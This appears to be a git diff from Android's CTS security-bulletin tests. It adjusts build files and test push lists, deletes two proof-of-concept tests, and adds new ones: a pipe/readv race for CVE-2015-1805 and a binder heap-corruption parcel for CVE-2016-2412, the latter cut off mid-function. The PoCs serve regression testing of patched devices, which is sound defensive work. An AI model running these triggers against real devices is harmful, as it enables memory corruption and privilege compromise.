--- a/hostsidetests/devicepolicy/app/IntentSender/Android.mk
+++ b/hostsidetests/devicepolicy/app/IntentSender/Android.mk
@@ -36,7 +36,6 @@
androidx.legacy_legacy-support-v4
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 19
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := arcts cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/LauncherTests/Android.mk b/hostsidetests/devicepolicy/app/LauncherTests/Android.mk
index f744237..e37617e 100644
--- a/hostsidetests/devicepolicy/app/LauncherTests/Android.mk
+++ b/hostsidetests/devicepolicy/app/LauncherTests/Android.mk
@@ -35,7 +35,6 @@
testng
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 21
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/LauncherTestsSupport/Android.mk b/hostsidetests/devicepolicy/app/LauncherTestsSupport/Android.mk
index 935be3b..ead09a4 100644
--- a/hostsidetests/devicepolicy/app/LauncherTestsSupport/Android.mk
+++ b/hostsidetests/devicepolicy/app/LauncherTestsSupport/Android.mk
@@ -27,7 +27,6 @@
LOCAL_JAVA_LIBRARIES := junit
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 21
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/ManagedProfile/Android.mk b/hostsidetests/devicepolicy/app/ManagedProfile/Android.mk
index 0cba8bd..e876054 100644
--- a/hostsidetests/devicepolicy/app/ManagedProfile/Android.mk
+++ b/hostsidetests/devicepolicy/app/ManagedProfile/Android.mk
@@ -39,7 +39,6 @@
androidx.legacy_legacy-support-v4
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 20
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := arcts cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/PackageInstaller/Android.mk b/hostsidetests/devicepolicy/app/PackageInstaller/Android.mk
index f60242c..a1514ff 100644
--- a/hostsidetests/devicepolicy/app/PackageInstaller/Android.mk
+++ b/hostsidetests/devicepolicy/app/PackageInstaller/Android.mk
@@ -32,7 +32,6 @@
ub-uiautomator
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 21
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := arcts cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/ProfileOwner/Android.mk b/hostsidetests/devicepolicy/app/ProfileOwner/Android.mk
index 98e1e87..8a024f8 100644
--- a/hostsidetests/devicepolicy/app/ProfileOwner/Android.mk
+++ b/hostsidetests/devicepolicy/app/ProfileOwner/Android.mk
@@ -19,8 +19,6 @@
LOCAL_PACKAGE_NAME := CtsProfileOwnerApp
LOCAL_PRIVATE_PLATFORM_APIS := true
-LOCAL_MIN_SDK_VERSION := 24
-
LOCAL_MODULE_TAGS := optional
LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
diff --git a/hostsidetests/devicepolicy/app/TransferOwnerIncomingApp/Android.mk b/hostsidetests/devicepolicy/app/TransferOwnerIncomingApp/Android.mk
index 3941a50..7064258 100644
--- a/hostsidetests/devicepolicy/app/TransferOwnerIncomingApp/Android.mk
+++ b/hostsidetests/devicepolicy/app/TransferOwnerIncomingApp/Android.mk
@@ -35,7 +35,6 @@
testng
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 24
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/devicepolicy/app/TransferOwnerOutgoingApp/Android.mk b/hostsidetests/devicepolicy/app/TransferOwnerOutgoingApp/Android.mk
index afe245c..14f6ab5 100644
--- a/hostsidetests/devicepolicy/app/TransferOwnerOutgoingApp/Android.mk
+++ b/hostsidetests/devicepolicy/app/TransferOwnerOutgoingApp/Android.mk
@@ -35,7 +35,6 @@
testng
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 24
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/dumpsys/apps/ProcStatsHelperApp/Android.mk b/hostsidetests/dumpsys/apps/ProcStatsHelperApp/Android.mk
index bd6f0d73..c5c846b 100644
--- a/hostsidetests/dumpsys/apps/ProcStatsHelperApp/Android.mk
+++ b/hostsidetests/dumpsys/apps/ProcStatsHelperApp/Android.mk
@@ -32,7 +32,6 @@
androidx.legacy_legacy-support-v4
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 24
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/inputmethodservice/deviceside/devicetest/Android.mk b/hostsidetests/inputmethodservice/deviceside/devicetest/Android.mk
index a85b4d2..1727ad7 100644
--- a/hostsidetests/inputmethodservice/deviceside/devicetest/Android.mk
+++ b/hostsidetests/inputmethodservice/deviceside/devicetest/Android.mk
@@ -41,6 +41,5 @@
LOCAL_PACKAGE_NAME := CtsInputMethodServiceDeviceTests
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 19
include $(BUILD_CTS_PACKAGE)
diff --git a/hostsidetests/inputmethodservice/deviceside/edittextapp/Android.mk b/hostsidetests/inputmethodservice/deviceside/edittextapp/Android.mk
index a089809..30fdb08 100644
--- a/hostsidetests/inputmethodservice/deviceside/edittextapp/Android.mk
+++ b/hostsidetests/inputmethodservice/deviceside/edittextapp/Android.mk
@@ -36,6 +36,5 @@
LOCAL_PACKAGE_NAME := EditTextApp
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 28
include $(BUILD_PACKAGE)
diff --git a/hostsidetests/inputmethodservice/deviceside/ime1/Android.mk b/hostsidetests/inputmethodservice/deviceside/ime1/Android.mk
index 3b98a87..850b89f 100644
--- a/hostsidetests/inputmethodservice/deviceside/ime1/Android.mk
+++ b/hostsidetests/inputmethodservice/deviceside/ime1/Android.mk
@@ -37,6 +37,5 @@
LOCAL_PACKAGE_NAME := CtsInputMethod1
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 19
include $(BUILD_PACKAGE)
diff --git a/hostsidetests/inputmethodservice/deviceside/ime2/Android.mk b/hostsidetests/inputmethodservice/deviceside/ime2/Android.mk
index 7b9ebeb..fcd146c 100644
--- a/hostsidetests/inputmethodservice/deviceside/ime2/Android.mk
+++ b/hostsidetests/inputmethodservice/deviceside/ime2/Android.mk
@@ -37,6 +37,5 @@
LOCAL_PACKAGE_NAME := CtsInputMethod2
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 19
include $(BUILD_PACKAGE)
diff --git a/hostsidetests/inputmethodservice/deviceside/provider/Android.mk b/hostsidetests/inputmethodservice/deviceside/provider/Android.mk
index 365f792..b8f308d 100644
--- a/hostsidetests/inputmethodservice/deviceside/provider/Android.mk
+++ b/hostsidetests/inputmethodservice/deviceside/provider/Android.mk
@@ -36,6 +36,5 @@
LOCAL_PACKAGE_NAME := CtsInputMethodServiceEventProvider
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 19
include $(BUILD_PACKAGE)
diff --git a/hostsidetests/media/app/MediaSessionTest/Android.mk b/hostsidetests/media/app/MediaSessionTest/Android.mk
index 5be80de..174a744 100644
--- a/hostsidetests/media/app/MediaSessionTest/Android.mk
+++ b/hostsidetests/media/app/MediaSessionTest/Android.mk
@@ -35,6 +35,5 @@
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 26
include $(BUILD_CTS_PACKAGE)
diff --git a/hostsidetests/security/Android.mk b/hostsidetests/security/Android.mk
index cdf71dc..8bef613 100644
--- a/hostsidetests/security/Android.mk
+++ b/hostsidetests/security/Android.mk
@@ -21,7 +21,7 @@
LOCAL_MODULE_TAGS := optional
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
+LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
# Must match the package name in CtsTestCaseList.mk
LOCAL_MODULE := CtsSecurityHostTestCases
diff --git a/hostsidetests/securitybulletin/Android.mk b/hostsidetests/securitybulletin/Android.mk
index a07fbbd..fc814a5 100644
--- a/hostsidetests/securitybulletin/Android.mk
+++ b/hostsidetests/securitybulletin/Android.mk
@@ -23,7 +23,7 @@
LOCAL_MODULE_TAGS := optional
# tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_COMPATIBILITY_SUITE := cts vts general-tests sts
# Must match the package name in CtsTestCaseList.mk
LOCAL_MODULE := CtsSecurityBulletinHostTestCases
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 894cf17..1f29251 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -27,7 +27,6 @@
<option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
<option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
<option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
- <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
<option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
<option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
<option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
@@ -40,6 +39,7 @@
<!-- Bulletin 2016-04 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-2412->/data/local/tmp/CVE-2016-2412" />
<option name="push" value="CVE-2016-0844->/data/local/tmp/CVE-2016-0844" />
<option name="push" value="CVE-2016-2419->/data/local/tmp/CVE-2016-2419" />
@@ -47,11 +47,11 @@
<!-- Bulletin 2016-05 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2016-2460->/data/local/tmp/CVE-2016-2460" />
+ <option name="push" value="CVE-2015-1805->/data/local/tmp/CVE-2015-1805" />
<!--__________________-->
<!-- Bulletin 2016-06 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2016-2062->/data/local/tmp/CVE-2016-2062" />
<!--__________________-->
<!-- Bulletin 2016-07 -->
@@ -60,7 +60,6 @@
<!-- Bulletin 2016-09 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2015-8839->/data/local/tmp/CVE-2015-8839" />
<option name="push" value="CVE-2016-2471->/data/local/tmp/CVE-2016-2471" />
<!--__________________-->
@@ -83,11 +82,13 @@
<!--__________________-->
<!-- Bulletin 2017-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0415->/data/local/tmp/CVE-2017-0415" />
<option name="push" value="CVE-2017-0426->/data/local/tmp/CVE-2017-0426" />
<!--__________________-->
<!-- Bulletin 2017-03 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0477->/data/local/tmp/CVE-2017-0477" />
<option name="push" value="CVE-2017-0479->/data/local/tmp/CVE-2017-0479" />
<option name="push" value="CVE-2017-0334->/data/local/tmp/CVE-2017-0334" />
<option name="push" value="CVE-2016-8479->/data/local/tmp/CVE-2016-8479" />
@@ -143,6 +144,7 @@
<!--__________________-->
<!-- Bulletin 2018-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-13273->/data/local/tmp/CVE-2017-13273" />
<option name="push" value="CVE-2017-13232->/data/local/tmp/CVE-2017-13232" />
<!--__________________-->
@@ -154,13 +156,26 @@
<!-- Bulletin 2018-07 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2018-9424->/data/local/tmp/CVE-2018-9424" />
+
+ <!--__________________-->
<!-- Bulletin 2018-10 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="CVE-2018-9490->/data/local/tmp/CVE-2018-9490" />
+ <option name="push" value="CVE-2018-9515->/data/local/tmp/CVE-2018-9515" />
<option name="append-bitness" value="true" />
</target_preparer>
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="CtsHostLaunchAnyWhereApp.apk" />
+ </target_preparer>
+
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="OomCatcher.apk" />
+ </target_preparer>
+
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsSecurityBulletinHostTestCases.jar" />
<option name="runtime-hint" value="8m40s" />
diff --git a/hostsidetests/securitybulletin/res/CVE-2017-0477.gif b/hostsidetests/securitybulletin/res/CVE-2017-0477.gif
new file mode 100644
index 0000000..67bd51f
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2017-0477.gif
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/CVE-2017-0647.zip b/hostsidetests/securitybulletin/res/CVE-2017-0647.zip
new file mode 100644
index 0000000..e01eaf4
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2017-0647.zip
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2016_3916.apk b/hostsidetests/securitybulletin/res/cve_2016_3916.apk
deleted file mode 100644
index 96c6128..0000000
--- a/hostsidetests/securitybulletin/res/cve_2016_3916.apk
+++ /dev/null
Binary files differ
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/Android.mk
old mode 100755
new mode 100644
similarity index 87%
rename from hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
rename to hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/Android.mk
index 5e53ee5..6dd41bd
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/Android.mk
@@ -15,19 +15,16 @@
LOCAL_PATH := $(call my-dir)
include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-2062
+LOCAL_MODULE := CVE-2015-1805
LOCAL_SRC_FILES := poc.c
LOCAL_MULTILIB := both
LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-LOCAL_SHARED_LIBRARIES := liblog
-
-# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts sts vts
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
-
+LOCAL_CFLAGS := -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/poc.c
new file mode 100644
index 0000000..c80b5ed
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-1805/poc.c
@@ -0,0 +1,112 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include "../includes/common.h"
+
+#define BUFS 256
+#define IOV_LEN 16
+#define MAGIC 7
+
+int fd[2];
+struct iovec *iovs = NULL;
+
+void *func_evil(void *data) {
+ munmap((void *)(0x45678000), PAGE_SIZE);
+ mmap((void *)(0x45678000), PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+ return data;
+}
+
+void *func_readv(void *data) {
+ readv(fd[0], iovs, BUFS);
+ return data;
+}
+
+int main() {
+ int ret = -1, i;
+ void *bufs[BUFS];
+ time_t test_started = start_timer();
+ pthread_t thr_evil, thr_readv;
+
+ if (pipe(fd) < 0) {
+ goto __out;
+ }
+ fcntl(fd[0], F_SETFL, O_NONBLOCK);
+ fcntl(fd[1], F_SETFL, O_NONBLOCK);
+
+ iovs = (struct iovec *)malloc(sizeof(bufs) / sizeof(bufs[0]) *
+ sizeof(struct iovec));
+ if (iovs == NULL) {
+ goto __close_pipe;
+ }
+
+ bufs[MAGIC] = mmap((void *)(0x45678000), PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
+ if (bufs[MAGIC] == MAP_FAILED) {
+ goto __close_pipe;
+ }
+
+ for (size_t i = 0; i < sizeof(bufs) / sizeof(bufs[0]); i++) {
+ if (i == MAGIC) continue;
+ bufs[i] = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ if (bufs[i] == MAP_FAILED) {
+ goto __free_bufs;
+ }
+
+ iovs[i].iov_base = bufs[i];
+ iovs[i].iov_len = IOV_LEN;
+ }
+
+ iovs[MAGIC - 1].iov_len = IOV_LEN * 10;
+ iovs[MAGIC].iov_base = bufs[MAGIC];
+ iovs[MAGIC].iov_len = IOV_LEN;
+
+ i = 0;
+
+ while (timer_active(test_started)) {
+ write(fd[1], bufs[0], PAGE_SIZE);
+
+ pthread_create(&thr_evil, NULL, func_evil, NULL);
+ pthread_create(&thr_readv, NULL, func_readv, NULL);
+
+ pthread_join(thr_evil, NULL);
+ pthread_join(thr_readv, NULL);
+ }
+
+__free_bufs:
+ for (size_t i = 0; i < sizeof(bufs) / sizeof(bufs[0]); i++) {
+ if (bufs[i]) munmap(bufs[i], PAGE_SIZE);
+ }
+
+__close_pipe:
+ close(fd[0]);
+ close(fd[1]);
+
+__out:
+ return ret;
+
+ return 0;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c
deleted file mode 100755
index c6a330f..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-8839/poc.c
+++ /dev/null
@@ -1,59 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-#include <cutils/log.h>
-#include <errno.h>
-#include <fcntl.h>
-#include <linux/falloc.h>
-#include <linux/magic.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/types.h>
-#include <sys/utsname.h>
-#include <sys/vfs.h>
-#include <unistd.h>
-
-int main(void) {
- int fd = -1, result = -1;
- char tmpFile[32];
- struct statfs sfs;
-
- memset(tmpFile, 0, sizeof(tmpFile));
- strncpy(tmpFile, "/data/local/tmp/tmpFile", 24);
-
- fd = open(tmpFile, O_WRONLY | O_APPEND | O_CREAT, 0644);
- if (fd < 0) {
- ALOGE("Creation of tmp file is failed [%s]", strerror(errno));
- return -1;
- }
-
- fstatfs(fd, &sfs);
- if (sfs.f_type == EXT4_SUPER_MAGIC) {
- result = fallocate(fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, 1);
- if (result < 0 && errno == EOPNOTSUPP) {
- ALOGD("fallocate result [%s] errno [%d]", strerror(errno), errno);
- ALOGE("fallocate result EOPNOTSUPP");
- }
- }
-
- if (fd) {
- close(fd);
- }
-
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/poc.c
deleted file mode 100644
index d8bdbdb..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/poc.c
+++ /dev/null
@@ -1,107 +0,0 @@
-/**
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-#define _GNU_SOURCE
-
-#define LOG_TAG "CVE-2016-2062"
-
-#include <errno.h>
-#include <fcntl.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/ioctl.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include <unistd.h>
-#include <cutils/log.h>
-
-struct kgsl_perfcounter_query {
- unsigned int groupid;
- /* Array to return the current countable for up to size counters */
- unsigned int *countables;
- unsigned int count;
- unsigned int max_counters;
- /* private: reserved for future use */
- unsigned int __pad[2]; /* For future binary compatibility */
-};
-
-/* ioctls
- * Refer msm_kgsl.h
- */
-#define KGSL_IOC_TYPE 0x09
-#define IOCTL_KGSL_PERFCOUNTER_QUERY \
- _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query)
-
-int main() {
- int fd, ret;
- struct kgsl_perfcounter_query perf_query;
-
- fd = open("/dev/kgsl-3d0", O_RDWR);
- if (fd < 0) {
- ALOGE("Unable to open /dev/kgsl-3d0 - Errno %d (%s)\n", errno,
- strerror(errno));
- exit(EXIT_FAILURE);
- }
-
- memset(&perf_query, 0, sizeof(struct kgsl_perfcounter_query));
-
- /* setup sane params to pass a few checks
- * set count=0 and countables=NULL to get max_counters
- * value to allocate memory for countables
- */
- perf_query.groupid = 1;
- perf_query.count = 0;
- perf_query.countables = NULL;
-
- ret = ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &perf_query);
- if (ret < 0) {
- ALOGE("Error ioctl failed %d (%s)\n", errno,
- strerror(errno));
- } else {
- // Make sure the max_counters within the limit [1:1000]
- if(perf_query.max_counters > 0 &&
- perf_query.max_counters < 1000) {
- perf_query.countables = (unsigned int*) malloc(
- perf_query.max_counters * sizeof(unsigned int));
- if(perf_query.countables == NULL) {
- ALOGE("malloc failed\n");
- } else {
- /* bad data creates out of memory issue
- * Errno 12 (out of memory)
- */
- perf_query.count = 0x80000001;
-
- ret = ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &perf_query);
- if (ret < 0 && errno == 12) { //ENOMEM(12) error
- ALOGE("CVE-2016-2062 failed\n");
- } else {
- ALOGE("CVE-2016-2062 passed\n");
- }
- }
- }
- }
-
- if(NULL != perf_query.countables) {
- free(perf_query.countables);
- perf_query.countables = NULL;
- }
-
- if (fd > -1)
- close(fd);
-
- return EXIT_SUCCESS;
-}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk
old mode 100755
new mode 100644
similarity index 79%
copy from hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
copy to hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk
index 5e53ee5..77de47e
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2062/Android.mk
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/Android.mk
@@ -1,33 +1,35 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-2062
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-LOCAL_SHARED_LIBRARIES := liblog
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts sts vts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
-
-include $(BUILD_CTS_EXECUTABLE)
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-2412
+LOCAL_SRC_FILES := poc.cpp
+
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_SHARED_LIBRARIES := libbinder \
+ libutils
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp
new file mode 100644
index 0000000..7e3b067
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2412/poc.cpp
@@ -0,0 +1,99 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+
+using namespace android;
+typedef enum TRANTYPE { HEAPSPRAY, HEAPCORRUPT, HEAPFENGSHUI } TRANTYPE;
+
+static void writeParcelableHead(Parcel *pData, const char *class_name) {
+ // write key
+ static int count = 1;
+ const int VAL_PARCELABLE = 4;
+ char buffer[16] = {0};
+ snprintf(buffer, 16, "%d", count);
+
+ pData->writeString16(String16((const char *)buffer));
+ pData->writeInt32(VAL_PARCELABLE);
+ pData->writeString16(String16(class_name));
+}
+
+void writeRegion(Parcel *pData) {
+ pData->writeInt32(100); // length of region;
+ pData->writeInt32(
+ 0x3fffffff); // runCount, the allocted size will be 0x3fffffff*4+16=0xc
+ pData->writeInt32(0xf); // fBounds
+ pData->writeInt32(0xf); // YSpanCount
+ pData->writeInt32(0xf); // IntervalCount
+
+ char buffer[100];
+ memset(buffer, 0xcc,
+ sizeof(buffer)); // this buffer will be used to corrrupt the heap
+ pData->write(buffer, sizeof(buffer));
+}
+
+static void writeBundle(Parcel *pData, int type) {
+ size_t lengthPos = pData->dataPosition();
+ pData->writeInt32(0xfffff);
+ const int BUNDLE_MAGIC = 0x4C444E42;
+ pData->writeInt32(BUNDLE_MAGIC);
+ size_t startPos = pData->dataPosition();
+
+ if (type == HEAPCORRUPT) {
+ pData->writeInt32(1); // from writeArrayMapInternal,object numbers in bundle
+ writeParcelableHead(pData, "android.graphics.Region");
+ writeRegion(pData);
+ } else { // other than HEAPCORRUPT
+ exit(0);
+ }
+
+ size_t endPos = pData->dataPosition();
+ // Backpatch length
+ pData->setDataPosition(lengthPos);
+ int length = endPos - startPos;
+ pData->writeInt32(length);
+ pData->setDataPosition(endPos);
+}
+
+static void transact(sp<IBinder> &service, TRANTYPE type) {
+ const int CONVERT_TO_TRANSLUCENT_TRANSACTION = 175;
+ Parcel data, reply;
+
+ data.writeInterfaceToken(String16("android.app.IActivityManager"));
+ data.writeStrongBinder(service);
+ data.writeInt32(333);
+ writeBundle(&data, type);
+ service->transact(CONVERT_TO_TRANSLUCENT_TRANSACTION, data, &reply);
+}
+
+int main(__attribute__((unused)) int argc,
